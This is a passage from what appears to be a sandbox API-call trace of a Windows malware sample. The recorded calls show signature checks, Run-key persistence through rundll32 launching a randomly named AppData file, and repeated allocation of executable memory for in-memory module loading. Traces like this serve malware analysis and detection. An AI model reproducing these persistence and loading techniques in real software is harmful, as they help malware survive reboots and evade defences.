Size=0x60) returned 0x2a76420 [0665.365] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf51c) returned 0x0 [0665.365] GetProcessHeap () returned 0x530000 [0665.365] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7248 [0665.365] GetProcessHeap () returned 0x530000 [0665.365] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cce68 [0665.365] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0665.366] GetProcessHeap () returned 0x530000 [0665.366] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7248 | out: hHeap=0x530000) returned 1 [0665.366] GetProcessHeap () returned 0x530000 [0665.366] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cce68 | out: hHeap=0x530000) returned 1 [0665.366] GetProcessHeap () returned 0x530000 [0665.367] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62e50 [0665.367] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0665.367] GetProcessHeap () returned 0x530000 [0665.367] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62e50 | out: hHeap=0x530000) returned 1 [0665.367] GetProcessHeap () returned 0x530000 [0665.367] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0665.367] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0665.367] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a76468, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0665.367] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0665.367] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0665.367] GetProcessHeap () returned 0x530000 [0665.368] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0665.368] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0665.368] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a76424, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0665.369] GetProcessHeap () returned 0x530000 [0665.369] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c690 [0665.371] GetProcessHeap () returned 0x530000 [0665.371] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0665.371] GetProcessHeap () returned 0x530000 [0665.372] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0665.372] GetProcessHeap () returned 0x530000 [0665.372] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5fafd0 | out: hHeap=0x530000) returned 1 [0665.372] GetProcessHeap () returned 0x530000 [0665.373] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0665.373] GetProcessHeap () returned 0x530000 [0665.373] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0665.373] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0665.373] GetProcessHeap () returned 0x530000 [0665.373] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83ca0 [0665.373] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",uPtjtXDkcbZ") returned 101 [0665.373] GetProcessHeap () returned 0x530000 [0665.373] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83ca0 | out: hHeap=0x530000) returned 1 [0665.373] GetProcessHeap () returned 0x530000 [0665.373] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0665.374] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x604, lpdwDisposition=0x0) returned 0x0 [0665.374] GetProcessHeap () returned 0x530000 [0665.374] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0665.375] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",uPtjtXDkcbZ") returned 101 [0665.375] RegSetValueExW (in: hKey=0x604, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",uPtjtXDkcbZ", cbData=0xcc | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",uPtjtXDkcbZ") returned 0x0 [0665.375] RegCloseKey (hKey=0x604) returned 0x0 [0665.376] GetProcessHeap () returned 0x530000 [0665.376] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c690 | out: hHeap=0x530000) returned 1 [0665.376] GetProcessHeap () returned 0x530000 [0665.376] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0665.376] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xdf729) Thread: id = 99 os_tid = 0xe38 Thread: id = 100 os_tid = 0xe3c [0142.702] malloc (_Size=0x5f5e100) returned 0x2340020 [0145.839] atoi (_Str="64") returned 64 [0145.839] atoi (_Str="8192") returned 8192 [0145.840] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x260000 [0145.843] malloc (_Size=0x3afd) returned 0x202aed0 [0145.843] malloc (_Size=0x3afd) returned 0x202e9d8 [0145.908] GetLastError () returned 0x0 [0145.909] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0145.909] GetCurrentThreadId () returned 0xe3c [0145.909] calloc (_Count=0x1, _Size=0xc0) returned 0x3a32e8 [0145.909] GetCurrentThreadId () returned 0xe3c [0145.909] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0145.909] GetCurrentThreadId () returned 0xe3c [0145.909] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1b0 [0145.909] GetCurrentProcess () returned 0xffffffff [0145.909] GetCurrentThread () returned 0xfffffffe [0145.909] GetCurrentProcess () returned 0xffffffff [0145.909] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3a32fc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3a32fc*=0x1b4) returned 1 [0145.910] GetThreadPriority (hThread=0x1b4) returned 0 [0145.910] SetLastError (dwErrCode=0x0) [0145.910] GetLastError () returned 0x0 [0145.910] realloc (_Block=0x0, _Size=0x4) returned 0x3a2c88 [0145.910] realloc (_Block=0x0, _Size=0x1) returned 0x3a2c98 [0145.910] SetLastError (dwErrCode=0x0) [0145.910] GetNativeSystemInfo (in: lpSystemInfo=0x33f924 | out: lpSystemInfo=0x33f924*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0145.910] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0145.910] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x2d0000 [0145.911] GetProcessHeap () returned 0x530000 [0145.911] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x5a7180 [0145.911] VirtualAlloc (lpAddress=0x2d0000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2d0000 [0145.911] VirtualAlloc (lpAddress=0x2d1000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x2d1000 [0145.914] VirtualAlloc (lpAddress=0x2f4000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x2f4000 [0145.914] VirtualAlloc (lpAddress=0x2f5000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2f5000 [0145.915] VirtualAlloc (lpAddress=0x2f6000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2f6000 [0145.915] GetLastError () returned 0x1e7 [0145.915] SetLastError (dwErrCode=0x1e7) [0145.915] GetLastError () returned 0x1e7 [0145.915] SetLastError (dwErrCode=0x1e7) [0145.915] GetLastError () returned 0x1e7 [0145.915] SetLastError (dwErrCode=0x1e7) [0145.915] GetLastError () returned 0x1e7 [0145.915] SetLastError (dwErrCode=0x1e7) [0145.915] VirtualProtect (in: lpAddress=0x2d1000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x33f7fc | out: lpflOldProtect=0x33f7fc*=0x4) returned 1 [0145.920] GetLastError () returned 0x1e7 [0145.920] SetLastError (dwErrCode=0x1e7) [0145.920] GetLastError () returned 0x1e7 [0145.920] SetLastError (dwErrCode=0x1e7) [0145.920] GetLastError () returned 0x1e7 [0145.920] SetLastError (dwErrCode=0x1e7) [0145.920] VirtualProtect (in: lpAddress=0x2f4000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x33f7fc | out: lpflOldProtect=0x33f7fc*=0x4) returned 1 [0145.921] GetLastError () returned 0x1e7 [0145.921] SetLastError (dwErrCode=0x1e7) [0145.921] GetLastError () returned 0x1e7 [0145.921] SetLastError (dwErrCode=0x1e7) [0145.921] GetLastError () returned 0x1e7 [0145.921] SetLastError (dwErrCode=0x1e7) [0145.921] VirtualProtect (in: lpAddress=0x2f5000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x33f7fc | out: lpflOldProtect=0x33f7fc*=0x4) returned 1 [0145.921] GetLastError () returned 0x1e7 [0145.921] SetLastError (dwErrCode=0x1e7) [0145.921] GetLastError () returned 0x1e7 [0145.921] SetLastError (dwErrCode=0x1e7) [0145.921] GetLastError () returned 0x1e7 [0145.921] SetLastError (dwErrCode=0x1e7) [0145.921] VirtualFree (lpAddress=0x2f6000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0145.924] GetLastError () returned 0x1e7 [0145.924] SetLastError (dwErrCode=0x1e7) [0145.924] GetLastError () returned 0x1e7 [0145.924] SetLastError (dwErrCode=0x1e7) [0145.924] GetLastError () returned 0x1e7 [0145.924] SetLastError (dwErrCode=0x1e7) [0146.086] GetModuleFileNameW (in: hModule=0x6ab00000, lpFilename=0x33fbf8, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\oxeedtbi\\tfnfdhfu.kqr")) returned 0x36 [0146.087] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0146.087] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\oxeedtbi"), dwDesiredAccess=0x1, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x1bc [0146.087] GetProcessHeap () returned 0x530000 [0146.087] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1000) returned 0x5bdd10 [0146.087] ReadDirectoryChangesW (hDirectory=0x1bc, lpBuffer=0x5bdd10, nBufferLength=0x1000, bWatchSubtree=0, dwNotifyFilter=0x1, lpBytesReturned=0x33fbf4, lpOverlapped=0x0, lpCompletionRoutine=0x0) Thread: id = 102 os_tid = 0xe44 [0150.581] malloc (_Size=0x5f5e100) returned 0x2630020 [0153.682] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x2170000 [0153.685] malloc (_Size=0x3afd) returned 0x2032700 [0153.686] malloc (_Size=0x3afd) returned 0x2036208 [0153.701] GetLastError () returned 0x0 [0153.701] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0153.702] GetCurrentThreadId () returned 0xe44 [0153.702] calloc (_Count=0x1, _Size=0xc0) returned 0x2039d10 [0153.702] GetCurrentThreadId () returned 0xe44 [0153.702] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0153.702] GetCurrentThreadId () returned 0xe44 [0153.702] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x278 [0153.702] GetCurrentProcess () returned 0xffffffff [0153.702] GetCurrentThread () returned 0xfffffffe [0153.702] GetCurrentProcess () returned 0xffffffff [0153.702] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x2039d24, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2039d24*=0x280) returned 1 [0153.702] GetThreadPriority (hThread=0x280) returned 0 [0153.703] SetLastError (dwErrCode=0x0) [0153.703] GetLastError () returned 0x0 [0153.703] realloc (_Block=0x0, _Size=0x4) returned 0x3a2ca8 [0153.703] realloc (_Block=0x0, _Size=0x1) returned 0x3a2cb8 [0153.703] SetLastError (dwErrCode=0x0) [0153.703] GetNativeSystemInfo (in: lpSystemInfo=0x238f5c4 | out: lpSystemInfo=0x238f5c4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0153.703] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0153.703] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x21a0000 [0153.703] GetProcessHeap () returned 0x530000 [0153.703] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x5a7040 [0153.704] VirtualAlloc (lpAddress=0x21a0000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x21a0000 [0153.704] VirtualAlloc (lpAddress=0x21a1000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x21a1000 [0153.707] VirtualAlloc (lpAddress=0x21c4000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x21c4000 [0153.707] VirtualAlloc (lpAddress=0x21c5000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x21c5000 [0153.707] VirtualAlloc (lpAddress=0x21c6000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x21c6000 [0153.708] GetLastError () returned 0x1e7 [0153.708] SetLastError (dwErrCode=0x1e7) [0153.708] GetLastError () returned 0x1e7 [0153.708] SetLastError (dwErrCode=0x1e7) [0153.708] GetLastError () returned 0x1e7 [0153.708] SetLastError (dwErrCode=0x1e7) [0153.708] GetLastError () returned 0x1e7 [0153.708] SetLastError (dwErrCode=0x1e7) [0153.708] VirtualProtect (in: lpAddress=0x21a1000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x238f49c | out: lpflOldProtect=0x238f49c*=0x4) returned 1 [0153.713] GetLastError () returned 0x1e7 [0153.714] SetLastError (dwErrCode=0x1e7) [0153.714] GetLastError () returned 0x1e7 [0153.714] SetLastError (dwErrCode=0x1e7) [0153.714] GetLastError () returned 0x1e7 [0153.714] SetLastError (dwErrCode=0x1e7) [0153.714] VirtualProtect (in: lpAddress=0x21c4000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x238f49c | out: lpflOldProtect=0x238f49c*=0x4) returned 1 [0153.714] GetLastError () returned 0x1e7 [0153.714] SetLastError (dwErrCode=0x1e7) [0153.714] GetLastError () returned 0x1e7 [0153.714] SetLastError (dwErrCode=0x1e7) [0153.714] GetLastError () returned 0x1e7 [0153.714] SetLastError (dwErrCode=0x1e7) [0153.714] VirtualProtect (in: lpAddress=0x21c5000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x238f49c | out: lpflOldProtect=0x238f49c*=0x4) returned 1 [0153.715] GetLastError () returned 0x1e7 [0153.715] SetLastError (dwErrCode=0x1e7) [0153.715] GetLastError () returned 0x1e7 [0153.715] SetLastError (dwErrCode=0x1e7) [0153.715] GetLastError () returned 0x1e7 [0153.715] SetLastError (dwErrCode=0x1e7) [0153.715] VirtualFree (lpAddress=0x21c6000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0153.719] GetLastError () returned 0x1e7 [0153.719] SetLastError (dwErrCode=0x1e7) [0153.719] GetLastError () returned 0x1e7 [0153.719] SetLastError (dwErrCode=0x1e7) [0153.719] GetLastError () returned 0x1e7 [0153.719] SetLastError (dwErrCode=0x1e7) Thread: id = 103 os_tid = 0xe4c [0153.756] malloc (_Size=0x5f5e100) returned 0x2630020 [0156.650] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x2220000 [0156.653] malloc (_Size=0x3afd) returned 0x2039ff8 [0156.653] malloc (_Size=0x3afd) returned 0x203db00 [0156.663] GetLastError () returned 0x0 [0156.663] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0156.664] GetCurrentThreadId () returned 0xe4c [0156.664] calloc (_Count=0x1, _Size=0xc0) returned 0x3ad6e8 [0156.664] GetCurrentThreadId () returned 0xe4c [0156.664] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0156.664] GetCurrentThreadId () returned 0xe4c [0156.664] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2b0 [0156.664] GetCurrentProcess () returned 0xffffffff [0156.664] GetCurrentThread () returned 0xfffffffe [0156.664] GetCurrentProcess () returned 0xffffffff [0156.664] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3ad6fc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3ad6fc*=0x2b4) returned 1 [0156.665] GetThreadPriority (hThread=0x2b4) returned 0 [0156.665] SetLastError (dwErrCode=0x0) [0156.665] GetLastError () returned 0x0 [0156.665] realloc (_Block=0x0, _Size=0x4) returned 0x3a2cc8 [0156.665] realloc (_Block=0x0, _Size=0x1) returned 0x3a2cd8 [0156.665] SetLastError (dwErrCode=0x0) [0156.665] GetNativeSystemInfo (in: lpSystemInfo=0x24af7cc | out: lpSystemInfo=0x24af7cc*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0156.665] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0156.665] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x22a0000 [0156.665] GetProcessHeap () returned 0x530000 [0156.665] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x5a7000 [0156.666] VirtualAlloc (lpAddress=0x22a0000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x22a0000 [0156.666] VirtualAlloc (lpAddress=0x22a1000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x22a1000 [0156.668] VirtualAlloc (lpAddress=0x22c4000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x22c4000 [0156.668] VirtualAlloc (lpAddress=0x22c5000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x22c5000 [0156.668] VirtualAlloc (lpAddress=0x22c6000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x22c6000 [0156.669] GetLastError () returned 0x1e7 [0156.669] SetLastError (dwErrCode=0x1e7) [0156.669] GetLastError () returned 0x1e7 [0156.669] SetLastError (dwErrCode=0x1e7) [0156.669] GetLastError () returned 0x1e7 [0156.669] SetLastError (dwErrCode=0x1e7) [0156.669] GetLastError () returned 0x1e7 [0156.669] SetLastError (dwErrCode=0x1e7) [0156.669] VirtualProtect (in: lpAddress=0x22a1000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x24af6a4 | out: lpflOldProtect=0x24af6a4*=0x4) returned 1 [0156.672] GetLastError () returned 0x1e7 [0156.672] SetLastError (dwErrCode=0x1e7) [0156.672] GetLastError () returned 0x1e7 [0156.672] SetLastError (dwErrCode=0x1e7) [0156.672] GetLastError () returned 0x1e7 [0156.672] SetLastError (dwErrCode=0x1e7) [0156.672] VirtualProtect (in: lpAddress=0x22c4000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x24af6a4 | out: lpflOldProtect=0x24af6a4*=0x4) returned 1 [0156.673] GetLastError () returned 0x1e7 [0156.673] SetLastError (dwErrCode=0x1e7) [0156.673] GetLastError () returned 0x1e7 [0156.673] SetLastError (dwErrCode=0x1e7) [0156.673] GetLastError () returned 0x1e7 [0156.673] SetLastError (dwErrCode=0x1e7) [0156.673] VirtualProtect (in: lpAddress=0x22c5000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x24af6a4 | out: lpflOldProtect=0x24af6a4*=0x4) returned 1 [0156.673] GetLastError () returned 0x1e7 [0156.673] SetLastError (dwErrCode=0x1e7) [0156.673] GetLastError () returned 0x1e7 [0156.673] SetLastError (dwErrCode=0x1e7) [0156.673] GetLastError () returned 0x1e7 [0156.673] SetLastError (dwErrCode=0x1e7) [0156.673] VirtualFree (lpAddress=0x22c6000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0156.676] GetLastError () returned 0x1e7 [0156.676] SetLastError (dwErrCode=0x1e7) [0156.676] GetLastError () returned 0x1e7 [0156.676] SetLastError (dwErrCode=0x1e7) [0156.676] GetLastError () returned 0x1e7 [0156.676] SetLastError (dwErrCode=0x1e7) [0229.403] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0229.403] GetCurrentThreadId () returned 0xe4c [0229.403] GetCurrentThreadId () returned 0xe4c [0229.403] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0229.403] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0229.403] GetCurrentThreadId () returned 0xe4c [0229.403] ReleaseSemaphore (in: hSemaphore=0x144, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0229.403] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0xffffffff) returned 0x0 [0229.403] GetCurrentThreadId () returned 0xe4c [0229.403] ReleaseSemaphore (in: hSemaphore=0x148, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0229.403] CloseHandle (hObject=0x2b4) returned 1 [0229.403] CloseHandle (hObject=0x2b0) returned 1 [0229.404] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0229.404] GetCurrentThreadId () returned 0xe4c [0229.404] free (_Block=0x3a2cc8) [0229.404] free (_Block=0x3a2cd8) [0229.404] GetCurrentThreadId () returned 0xe4c [0229.404] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0229.404] malloc (_Size=0x5f5e100) returned 0x2e10020 [0231.174] atoi (_Str="64") returned 64 [0231.174] atoi (_Str="8192") returned 8192 [0231.174] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x27c0000 [0231.177] malloc (_Size=0x3afd) returned 0x2066838 [0231.177] malloc (_Size=0x3afd) returned 0x206a358 [0231.189] GetLastError () returned 0x0 [0231.189] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0231.189] GetCurrentThreadId () returned 0xe4c [0231.189] GetCurrentThreadId () returned 0xe4c [0231.189] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0231.190] GetCurrentThreadId () returned 0xe4c [0231.190] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2b0 [0231.190] GetCurrentProcess () returned 0xffffffff [0231.190] GetCurrentThread () returned 0xfffffffe [0231.190] GetCurrentProcess () returned 0xffffffff [0231.190] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3ad6fc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3ad6fc*=0x2b4) returned 1 [0231.190] GetThreadPriority (hThread=0x2b4) returned 0 [0231.190] SetLastError (dwErrCode=0x0) [0231.190] GetLastError () returned 0x0 [0231.190] realloc (_Block=0x0, _Size=0x4) returned 0x3a2cd8 [0231.190] realloc (_Block=0x0, _Size=0x1) returned 0x3a2cc8 [0231.190] SetLastError (dwErrCode=0x0) [0231.190] GetNativeSystemInfo (in: lpSystemInfo=0x24af930 | out: lpSystemInfo=0x24af930*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0231.190] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0231.190] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x2910000 [0231.191] GetProcessHeap () returned 0x530000 [0231.191] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x2b5fee8 [0231.191] VirtualAlloc (lpAddress=0x2910000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2910000 [0231.191] VirtualAlloc (lpAddress=0x2911000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x2911000 [0231.194] VirtualAlloc (lpAddress=0x2934000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x2934000 [0231.194] VirtualAlloc (lpAddress=0x2935000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2935000 [0231.195] VirtualAlloc (lpAddress=0x2936000, dwSize=0x400, 